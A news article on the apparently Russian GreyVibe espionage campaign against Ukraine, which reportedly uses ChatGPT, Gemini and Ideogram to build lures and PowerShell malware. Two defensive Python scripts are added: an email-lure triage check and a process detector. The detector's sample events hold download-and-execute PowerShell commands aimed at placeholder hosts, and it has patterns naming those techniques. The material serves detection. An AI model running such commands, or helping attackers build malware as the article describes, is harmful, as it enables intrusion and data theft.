Russian Hackers Use ChatGPT and Gemini to Build Malware

Key Takeaways

- GreyVibe has run a 10-month cyberespionage campaign targeting Ukrainian organizations using AI-generated content and malware
- The group uses ChatGPT, Gemini, and Ideogram AI to create phishing lures, fake websites, and custom hacking tools
- AI-generated code leaves detectable patterns that security researchers can use to track threat actors
AI as a Force Multiplier for Cyberespionage
A threat group with likely ties to Russia has turned commercial AI tools into weapons. The group, tracked as GreyVibe by cybersecurity firm WithSecure, has been using ChatGPT, Google Gemini, and image generator Ideogram AI to power a cyberespionage campaign against Ukrainian targets since at least August 2025.
WithSecure discovered the activity in January 2026. The researchers found that GreyVibe uses AI not just for writing phishing emails, but for building custom malware, creating realistic fake websites, and generating visual content that makes their lures more convincing.
“The use of AI is clearly lowering the barrier to entry, enabling actors with low-to-moderate technical skill to execute persistent and complex cyberespionage campaigns at scale.”
— WithSecure Research Team
The link to Russian-speaking operators comes from several technical indicators. The malware control panels are in Russian. Code comments are written in Russian. And the command-and-control servers are configured to Moscow time (UTC+3). WithSecure stopped short of calling it a nation-state operation, but noted the campaign aligns with Russian state interests.
Five Attack Chains, One Playbook
GreyVibe runs multiple attack campaigns simultaneously, each with a distinct approach. WithSecure identified five primary attack chains:
- PhantomMail: Spear-phishing emails with malicious ZIP or RAR files delivered through Google Drive and 4sync links. The emails impersonate Ukrainian government, emergency services, telecom, and energy organizations.
- PhantomClick: Fake CAPTCHA pages disguised as Zoom and LAPAS sites. Fake Cloudflare verification prompts trick victims into running commands that infect their own machines.
- PrincessClub: Fake Ukrainian adult and dating websites that deliver Android spyware (FallSpy) and Windows malware (PhantomRelay, LegionRelay). The operators created fake female Telegram personas and later added WebRTC video calls to capture victims' audio and video.
- DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs. These share infrastructure with the PrincessClub campaigns.
- Nebo: Fake Russian military communications login pages designed to trick Ukrainian military personnel into thinking they're accessing a Russian military terminal.

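The PhantomMail chain above (archives hosted on Google Drive or 4sync links, senders posing as Ukrainian government, emergency-service, telecom or energy bodies) can be triaged with a few mail-header and body heuristics. The script below is an added example, not code from the article or from WithSecure; the sample messages, domains and the 4sync path are constructed placeholders, and the scoring weights are an assumption, not a published rule.

```python
"""Triage heuristics for PhantomMail-style lures: an archive payload delivered through a
consumer file-sharing link, from a sender whose domain does not match the organisation it
claims to be.  Added example with constructed sample messages (not the article's code)."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Hosts the article names as delivery channels (plus their common aliases).
FILE_SHARING_HOSTS = {"drive.google.com", "docs.google.com", "4sync.com", "www.4sync.com"}
ARCHIVE_EXTENSIONS = (".zip", ".rar", ".7z")
URL_RX = re.compile(r"https?://[^\s<>'\")]+", re.I)
# A dotted name inside the From display name, e.g. 'Press Office agency.gov.example'.
DOMAIN_IN_NAME_RX = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)


def _text_parts(msg):
    """Yield decoded text bodies, skipping attachments."""
    for part in msg.walk():
        if part.get_content_maintype() == "text" and part.get_filename() is None:
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "utf-8", errors="replace")


def extract_urls(msg):
    return [u for text in _text_parts(msg) for u in URL_RX.findall(text)]


def attachment_names(msg):
    return [p.get_filename() for p in msg.walk() if p.get_filename()]


def sender_domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def triage(raw_message):
    """Return a dict with the reasons a message looks like a PhantomMail-style lure."""
    msg = message_from_string(raw_message)
    reasons = []
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = sender_domain(addr)

    # 1. Links to consumer file-sharing services, which the lure uses to host the archive.
    sharing = [u for u in extract_urls(msg)
               if (urlparse(u).hostname or "").lower() in FILE_SHARING_HOSTS]
    if sharing:
        reasons.append("file-sharing-link")

    # 2. Archive payload, attached directly or named in the path of a sharing link.
    targets = attachment_names(msg) + [urlparse(u).path for u in sharing]
    if any(t.lower().endswith(ARCHIVE_EXTENSIONS) for t in targets):
        reasons.append("archive-payload")

    # 3. Display name carries a domain that differs from the real sender domain.
    claimed = [d.lower() for d in DOMAIN_IN_NAME_RX.findall(name)]
    if any(d != from_domain and not from_domain.endswith("." + d) for d in claimed):
        reasons.append("display-name-domain-mismatch")

    # 4. Reply-To steering answers to a domain other than the sender's.
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and sender_domain(reply) != from_domain:
        reasons.append("reply-to-mismatch")

    return {"subject": msg.get("Subject", ""), "from_domain": from_domain,
            "score": len(reasons), "reasons": reasons}


# Constructed samples (all domains and paths are placeholders).
SAMPLE_LURE = """\
From: "Press Office agency.gov.example" <press.office@mailbox.example.invalid>
Reply-To: press.office@another.example.invalid
To: staff@target.example.invalid
Subject: Urgent: updated evacuation orders
Content-Type: text/plain; charset="utf-8"

Colleagues, the signed order is available at the link below.
https://www.4sync.com/CONSTRUCTED-PATH/order_2026.zip
"""

SAMPLE_BENIGN = """\
From: "IT Helpdesk" <helpdesk@target.example.invalid>
To: staff@target.example.invalid
Subject: Maintenance window
Content-Type: text/plain; charset="utf-8"

The VPN gateway restarts tonight. Details: https://intranet.target.example.invalid/notices/42
"""

SAMPLE_ATTACHMENT = """\
From: "Logistics" <logistics@partner.example.invalid>
To: staff@target.example.invalid
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see attached.
--b1
Content-Type: application/octet-stream; name="invoice.rar"
Content-Disposition: attachment; filename="invoice.rar"
Content-Transfer-Encoding: base64

UmFyIQ==
--b1--
"""

if __name__ == "__main__":
    for raw in (SAMPLE_LURE, SAMPLE_BENIGN, SAMPLE_ATTACHMENT):
        print(triage(raw))
```

Each reason is independent, so a single archive attachment from a known partner scores 1 and is worth a look but not a block, while the constructed lure trips all four checks. In production the same function would run on messages pulled from a mail gateway quarantine rather than on inline strings.
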
AI-Built Malware and Obfuscation Tools
The AI assistance goes beyond content creation. WithSecure found that GreyVibe likely used large language models to develop several custom tools. These include LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all obfuscation tools designed to hide malicious code from security software.
The group's primary weapon is LegionRelay, a PowerShell-based remote access trojan that WithSecure believes was built with AI assistance. LegionRelay can steal files, capture screenshots, grab browser credentials, extract data from Telegram and WhatsApp, and set up remote desktop access for the attackers.
A second RAT called PhantomRelay handles system fingerprinting and dynamic script loading. Both tools give GreyVibe persistent access to compromised systems.
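
Two of the details above give defenders a concrete telemetry hook: the PhantomClick chain has the victim run a command by hand, and the resulting implants (LegionRelay, PhantomRelay) are PowerShell-based. On an endpoint that means a shell interpreter spawned by the user's shell (explorer.exe, which owns the Win+R Run dialog) with download-and-execute switches on its command line. The detector below is an added example, not WithSecure's detection logic or anything from the article; the event fields mirror Sysmon-style process-creation records, the sample events are constructed, and the indicator list is a generic ClickFix heuristic rather than GreyVibe-specific signatures.

```python
"""Flag user-launched shell interpreters whose command line (including the decoded
-EncodedCommand payload) carries download-and-execute indicators.
Added example with constructed Sysmon-like events (not the article's code)."""
import base64
import re
from dataclasses import dataclass
from typing import Optional

SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
USER_LAUNCH_PARENTS = {"explorer.exe"}  # Run dialog and shell launches are children of explorer

# Indicator name -> pattern matched (case-insensitively) against the raw and decoded command line.
INDICATORS = {
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote-fetch": re.compile(
        r"\birm\b|\biwr\b|invoke-(webrequest|restmethod)|downloadstring|downloadfile", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass-flags": re.compile(r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "url": re.compile(r"https?://", re.I),
}
# PowerShell accepts any unique prefix of -EncodedCommand; the value is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext behind an -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyze(events):
    """Return findings for shell children of explorer.exe that show suspicious indicators."""
    findings = []
    for ev in events:
        if ev.parent_image.lower() not in USER_LAUNCH_PARENTS:
            continue
        if ev.image.lower() not in SHELL_CHILDREN:
            continue
        reasons = []
        text = ev.command_line
        decoded = decode_encoded_command(text)
        if decoded is not None:
            reasons.append("encoded-command")
            text = text + " " + decoded  # inspect the decoded script, not just the wrapper
        reasons += [name for name, rx in INDICATORS.items() if rx.search(text)]
        if reasons:
            findings.append({
                "event_id": ev.event_id,
                "severity": "high" if len(reasons) >= 3 else "medium",
                "reasons": reasons,
            })
    return findings


def _encode_ps(script: str) -> str:
    """Produce the base64/UTF-16LE form PowerShell expects (used only to build a sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events; hostnames are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(1, "explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\u\\notes.txt"),
    ProcessEvent(2, "explorer.exe", "powershell.exe", "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ProcessEvent(3, "explorer.exe", "powershell.exe",
                 'powershell -w hidden -nop -c "iex (irm https://verify.example.invalid/check)"'),
    ProcessEvent(4, "explorer.exe", "powershell.exe",
                 "powershell -enc " + _encode_ps(
                     "(New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/a')|iex")),
    ProcessEvent(5, "services.exe", "powershell.exe", "powershell -nop -c Get-Service"),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Event 2 (a plain `-File` launch) and event 5 (a service-spawned PowerShell) are deliberately left alone so the rule stays quiet on routine administration; the parent-process condition is what separates a pasted Run-dialog command from scheduled or service-driven scripts.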

AI Leaves a Trail
Here's the twist. The same AI tools that make GreyVibe more productive also make them easier to track. Security researchers identified distinct patterns in AI-generated code and images that function like a digital fingerprint.
Discussion on Reddit's r/cybersecurity and Hacker News has focused on these "AI-native" error patterns. Multiple security professionals noted that while AI speeds up attack development, the structural quirks in AI-generated content give defenders new ways to identify automated attacks.
WithSecure tracked GreyVibe for nearly a year by exploiting these patterns. The group's heavy reliance on AI-generated infrastructure created unique flaws that researchers could follow across campaigns.
Logicity's Take
What Organizations Should Watch For
GreyVibe's tactics offer a preview of what AI-enhanced attacks look like in practice. The quality of their phishing content is notably high. Emails and websites look professional. The decoy documents are convincing. The fake CAPTCHA pages could fool trained users.
Organizations connected to Ukraine or Ukrainian interests should treat this as an active threat. But the techniques GreyVibe uses will spread. Other groups will adopt similar AI-assisted methods. Security teams everywhere should prepare for phishing campaigns that look more polished and vary more rapidly than traditional attacks.
Frequently Asked Questions
What is GreyVibe?
GreyVibe is a likely Russian threat group discovered by WithSecure that uses AI tools like ChatGPT and Gemini to conduct cyberespionage against Ukrainian organizations. The group has been active since at least August 2025.
How do hackers use ChatGPT for cyberattacks?
GreyVibe uses ChatGPT and similar AI tools to write convincing phishing emails, create fake websites, generate realistic visual content, and develop custom malware and code obfuscation tools.
Can AI-generated malware be detected?
Yes. AI-generated code and content often contain distinctive patterns or structural quirks that security researchers can identify. WithSecure tracked GreyVibe for nearly a year by exploiting these AI fingerprints.
Who is being targeted by GreyVibe?
GreyVibe primarily targets Ukrainian or Ukraine-related organizations across military, government, civilian, and business sectors. Their phishing campaigns impersonate Ukrainian government agencies, energy companies, and telecom providers.
What malware does GreyVibe use?
The group uses several custom tools including LegionRelay and PhantomRelay (PowerShell RATs), FallSpy (Android spyware), and multiple code obfuscators (LOOKVALPS, LOOKVALJS, DAYLIGHT, TEASOUP).
Source: BleepingComputer
Manaal Khan
Tech & Innovation Writer